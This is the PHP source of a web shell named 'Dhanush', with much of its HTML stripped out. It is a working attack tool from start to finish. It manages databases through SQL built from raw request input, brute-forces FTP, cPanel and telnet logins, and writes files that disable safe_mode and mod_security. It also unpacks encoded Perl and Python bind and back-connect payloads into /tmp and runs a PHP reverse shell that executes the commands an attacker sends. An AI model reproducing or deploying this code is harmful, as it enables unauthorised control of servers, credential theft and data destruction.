\n\r" . $count . " rows returned.\r\n"; echo ""; } // View Table Data if($_GET['action'] == "viewdata") { global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data; $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; echo "
"; ?>

Data in Table
"; if( $tablename != "" ) echo "$dbname > $tablename
"; else echo "$dbname
"; $queryStr = ""; $pag = 0; $queryStr = stripslashes( $queryStr ); if( $queryStr == "" ) { if(isset($_REQUEST['page'])) { $res = mysql_query("select * from $tablename"); $getres = mysql_num_rows($res); $coun = ceil($getres/30); if($_REQUEST['page'] != 1) $pag = $_REQUEST['page'] * 30; else $pag = $_REQUEST['page'] * 30; $queryStr = "SELECT * FROM $tablename LIMIT $pag,30"; $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30"); $arrcount = 1; $arrdata[$arrcount] = 0; while($row = mysql_fetch_array($sql)) { $arrdata[$arrcount] = $row[$rowid]; $arrcount++; } } else { $queryStr = "SELECT * FROM $tablename LIMIT 0,30"; $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30"); $arrcount = 1; $arrdata[$arrcount] = 0; while($row = mysql_fetch_array($sql)) { $arrdata[$arrcount] = $row[$rowid]; $arrcount++; } } if( $orderby != "" ) $queryStr .= " ORDER BY $orderby"; echo "Schema\n"; } $pResult = mysql_query($queryStr ); $fieldt = mysql_fetch_field($pResult); $tablename = $fieldt->table; $errMsg = mysql_error(); $GLOBALS[queryStr] = $queryStr; if( $pResult == false ) { echoQueryResult(); return; } if( $pResult == 1 ) { $errMsg = "Success"; echoQueryResult(); return; } echo "
\n"; $row = mysql_num_rows( $pResult ); $col = mysql_num_fields( $pResult ); if( $row == 0 ) { echo "No Data Exist!"; return; } if( $rowperpage == "" ) $rowperpage = 30; if( $page == "" ) $page = 0; else $page--; mysql_data_seek( $pResult, $page * $rowperpage ); echo "\n"; echo "\n"; for( $i = 0; $i < $col; $i++ ) { $field = mysql_fetch_field( $pResult, $i ); echo "\n"; } echo "\n"; echo "\n"; $num=1; $acount = 1; for( $i = 0; $i < $rowperpage; $i++ ) { $rowArray = mysql_fetch_row( $pResult ); if( $rowArray == false ) break; echo "\n"; $key = ""; for( $j = 0; $j < $col; $j++ ) { $data = $rowArray[$j]; $field = mysql_fetch_field( $pResult, $j ); if( $field->primary_key == 1 ) $key .= "&" . $field->name . "=" . $data; if( strlen( $data ) > 30 ) $data = substr( $data, 0, 30 ) . "..."; $data = htmlspecialchars( $data ); echo "\n"; } if(!is_numeric($arrdata[$acount])) echo "\n"; else { echo "\n"; echo "\n"; $acount++; } } echo "\n"; echo "
"; if($action == "viewdata") echo "".$field->name."\n"; else echo $field->name."\n"; echo "Action
\n"; echo "$data\n"; echo "No KeyEditDelete
"; if($arrcount > 30) { $res = mysql_query("select * from $tablename"); $getres = mysql_num_rows($res); $coun = ceil($getres/30); echo "
"; echo "
"; } } // Delete Table Data if($_GET['action'] == "deleteData") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');"); $row = mysql_fetch_array($sql); $row = $row['COLUMN_NAME']; $rowid = $_GET[$row]; mysql_query("delete from $tablename where $row = '$rowid'"); listtable(); } // Edit Table Data if($_GET['action'] == "editData") { global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data; $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; echo "
"; ?>

primary_key == 1 ) if( $field->numeric == 1 ) $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND "; else $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND "; } $key = substr( $key, 0, strlen($key)-4 ); mysql_select_db( $dbname, $mysqlHandle ); $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle ); $data = mysql_fetch_array( $pResult ); echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); $num = mysql_num_rows( $pResult ); $pResultLen = mysql_list_fields( $dbname, $tablename ); $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',"; $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',"; for( $i = 0; $i < $num; $i++ ) { $field = mysql_fetch_array( $pResult ); $fieldname = $field["Field"]; $fieldtype = $field["Type"]; $len = mysql_field_len( $pResultLen, $i ); echo ""; echo ""; echo ""; echo "\n"; $value = htmlspecialchars($data[$i]); $type = strtok( $fieldtype, " (,)\n" ); if( $type == "enum" || $type == "set" ) { echo "\n"; } else { if( $len < 40 ) echo "\n"; else echo ""; } $fundata1=eregi_replace(',$', '', $fundata1); $fundata2=eregi_replace(',$', '', $fundata2); echo "
NameTypeFunctionData
$fieldname".$field["Type"]."\n"; echo "\n"; echo "\n"; if( $type == "enum" ) echo "\n"; while( $str = strtok( "'" ) ) { if( $value == $str ) echo "\n"; } $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,"; $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,"; echo "

\n"; echo "\n"; echo "\n"; echo "

\n"; } } // Edit Submit Table Data else if($_REQUEST['action'] == "editsubmitData") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_POST['dbname']; $tablename = $_POST['tablename']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');"); $row = mysql_fetch_array($sql); $row = $row['COLUMN_NAME']; $rowid = $_POST[$row]; $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); $num = mysql_num_rows( $pResult ); $rowcount = $num; $pResultLen = mysql_list_fields( $dbname, $tablename ); for( $i = 0; $i < $num; $i++ ) { $field = mysql_fetch_array( $pResult ); $fieldname = $field["Field"]; $arrdata = $_REQUEST[$fieldname]; $str .= " " . $fieldname . " = '" . $arrdata . "'"; $rowcount--; if($rowcount != 0) $str .= ","; } $str = "update $tablename set" . $str . " where $row=$rowid"; mysql_query($str); ?>
File $v Deleted Successfully
"; else echo "
Cannot Delete File $v
"; } else if(is_dir($v)) { rrmdir($v); } } } else if($_POST['choice'] == "chmod") { ?>
Change Permissions
=0;--$i) $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1)); echo "
"; if(@chmod($v,$perms)) echo "File $v Permissions Changed Successfully
"; else echo "Cannot Change $v File Permissions
"; echo "
"; } } } } else if($_POST['choice'] == "compre") { $actbox = $_POST["actbox"]; foreach ($actbox as $myv) $myv = explode(",",$myv); foreach ($myv as $v) { if(is_file($v)) { $zip = new ZipArchive(); $filename= basename($v) . '.zip'; if(($zip->open($filename, ZipArchive::CREATE))!==true) { echo '
Error: Unable to create zip file for $v';} else {echo "
File $v Compressed successfully";} $zip->addFile(basename($v)); $zip->close(); } else if(is_dir($v)) { if($os == "Linux") { $filename= basename($v); execmd("tar --create --recursion --file=$filename.tar $v"); echo "
File $v Compressed successfully as $v.tar"; } } } } else if($_POST['choice'] == "uncompre") { $actbox = $_POST["actbox"]; foreach ($actbox as $myv) $myv = explode(",",$myv); foreach ($myv as $v) { if(is_file($v) || is_dir($v)) { $zip = new ZipArchive; $filename= basename($v); $res = $zip->open($filename); if ($res === TRUE) { $pieces = explode(".",$filename); $zip->extractTo($pieces[0]); $zip->close(); echo "
File $v Unzipped successfully"; } else echo "
Error: Unable to Unzip file $v"; } } } } else if(isset($_GET['sitename'])) { $sitename = str_replace("http://","",$_GET['sitename']); $sitename = str_replace("http://www.","",$sitename); $sitename = str_replace("www.","",$sitename); $show = myexe("ls -la /etc/valiases/".$sitename); if(!empty($show)) echo $show; else echo "Cannot get the username"; } else if(isset($_GET['mydata'])) { listdatabase(); } else if(isset($_GET['home'])) { mainfun($_GET['home']); } else if(isset($_GET['dir'])) { mainfun($_GET['myfilepath']); } else if(isset($_GET['mydirpath'])) { echo is_writable($_GET['mydirpath'])?"< writable >":"< not writable >"; } else { ?> Dhanush : By Arjun
2) { flush(); $count++; } } } ?> 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; $count++; } ?>
System Info : Server Port : Software Info
Uid : Websites : Websites :
Disk Space : Free Space : Server IP : Your IP :
View Directories : Current Directory : ".htmlspecialchars($b).$directorysperator.''; $i++; } ?> [Home] Disable functions : Safe Mode : Download It
'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect'); $m2 = array('SQL'=>'database','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about'); echo ""; $menu = ''; foreach($m1 as $k => $v) $menu .= ""; echo $menu; echo "
[".$k."]
"; foreach($m2 as $k => $v) $menu1 .= ""; echo $menu1; echo "
[".$k."][SelfKill] [LogOut]
";?>
SecFilterEngine Off SecFilterScanPOST Off \n\r"); $file_pointer = fopen("ini.php", "w+"); fwrite($file_pointer, ""); $file_pointer = fopen("php.ini", "w+"); fwrite($file_pointer, "safe_mode = Off"); fclose($file_pointer); } else if(isset($_POST['cpanelattack'])) { if(!empty($_POST['username']) && !empty($_POST['password'])) { $userlist=explode("\n",$_POST['username']); $passlist=explode("\n",$_POST['password']); if($_POST['cracktype'] == "ftp") { foreach ($userlist as $user) { $pureuser = trim($user); foreach ($passlist as $password ) { $purepass = trim($password); ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout); } } } if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") { if($cracktype == "telnet") $cpanel_port="23"; else $cpanel_port="2082"; foreach ($userlist as $user) { $pureuser = trim($user); echo " [ - ] Processing user $pureuser ...

"; foreach ($passlist as $password ) { $purepass = trim($password); cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout); } } } } else $bdmessage = "
Enter Username & Password List
"; } else if(isset($_GET['info'])) { $bdmessage = "
".nl2br(shell_exec("whois ".$_GET['info']))."
"; } else if(isset($_POST['u'])) { $path = $_REQUEST['path']; if(is_dir($path)) { $setuploadvalue = 0; $uploadedFilePath = $_FILES['uploadfile']['name']; $tempName = $_FILES['uploadfile']['tmp_name']; if($os == "Windows") $uploadPath = $path . $directorysperator . $uploadedFilePath; else if($os == "Linux") $uploadPath = $path . $directorysperator . $uploadedFilePath; if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath)) $bdmessage = "File uploaded to $uploadPath"; else $bdmessage = "Failed to upload file to $uploadPath"; } ?>$out\n".execmd("ps aux | grep bp.pl").""; } else { @$fh=fopen("/tmp/bp.pl","w"); @fwrite($fh,gzinflate(base64_decode($bind_port_p))); @fclose($fh); execmd("chmod 0755 ".getcwd()."/bp.pl"); execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &"); $bdmessage = "
$out\n".execmd("ps aux | grep bp.pl")."
"; } } } } else if(isset($_POST['backconnect'])) { if($_POST['ip'] != "" && $_POST['port'] != "") { ?>Trying to connect...
"; execmd("perl ".getcwd()."/bc.pl $host $port &",$disable); if(!@unlink(getcwd()."/bc.pl")) echo "Warning: Failed to delete reverse-connection program
"; } else { @$fh=fopen("/tmp/bc.pl","w"); @fwrite($fh,gzuncompress(base64_decode($backconnect_perl))); @fclose($fh); $bdmessage = "Trying to connect..."; execmd("perl /tmp/bc.pl $host $port &",$disable); if(!@unlink("/tmp/bc.pl")) echo "

Warning: Failed to delete reverse-connection program


"; } } else if($_POST["lang"] == "python") { if(is_writable(".")) { $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error()); if($w_file) { @fputs($w_file,gzuncompress(base64_decode($back_connect_p))); @fclose($w_file); chmod(getcwd().'/bc.py', 0777); } execmd("python ".getcwd()."/bc.py $host $port &",$disable); $bdmessage = "Trying to connect..."; if(!@unlink(getcwd()."/bc.py")) echo "

Warning: Failed to delete reverse-connection program


"; } else { $w_file=@fopen("/tmp/bc.py","w"); if($w_file) { @fputs($w_file,gzuncompress(base64_decode($back_connect_p))); @fclose($w_file); chmod('/tmp/bc.py', 0777); } execmd("python /tmp/bc.py $host $port &",$disable); $bdmessage = "Trying to connect..."; if(!@unlink("/tmp/bc.py")) echo "

Warning: Failed to delete reverse-connection program


"; } } else if($_POST["lang"] == "php") { $bdmessage = "Trying to connect..."; $ip = $_POST['ip']; $port=$_POST['port']; $sockfd=fsockopen($ip , $port , $errno, $errstr ); if($errno != 0) { $bdmessage = "$errno : $errstr"; } else if (!$sockfd) { $result = "

Fatal : An unexpected error was occured when trying to connect!

"; } else { fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n================================================================="); $pwd = exec_all("pwd"); $sysinfo = exec_all("uname -a"); $id = exec_all("id"); $len = 1337; fputs($sockfd ,$sysinfo . "\n" ); fputs($sockfd ,$pwd . "\n" ); fputs($sockfd ,$id ."\n\n" ); fputs($sockfd ,$dateAndTime."\n\n" ); while(!feof($sockfd)) { $cmdPrompt ="(dhanush)[$]> "; fputs ($sockfd , $cmdPrompt ); $command= fgets($sockfd, $len); fputs($sockfd , "\n" . exec_all($command) . "\n\n"); } fclose($sockfd); } } } } else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2'])) { $temp = ""; for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++) { $uid = @posix_getpwuid($_GET['val1']); if ($uid) $temp .= join(':',$uid)."\n"; } echo '
'; paramexe('Users', $temp); } else if(isset($_GET['download'])) { download(); } else { ?>< writable >
":"< not writable >"; ?>

Upload file :
 

Create File :
Execute :
Create Directory :
Get Exploit 


Some Commands


धनुष
--==Coded By Arjun==--

जय हिन्द
Dhanush
User Name :
Password :
--==Coded By Arjun==--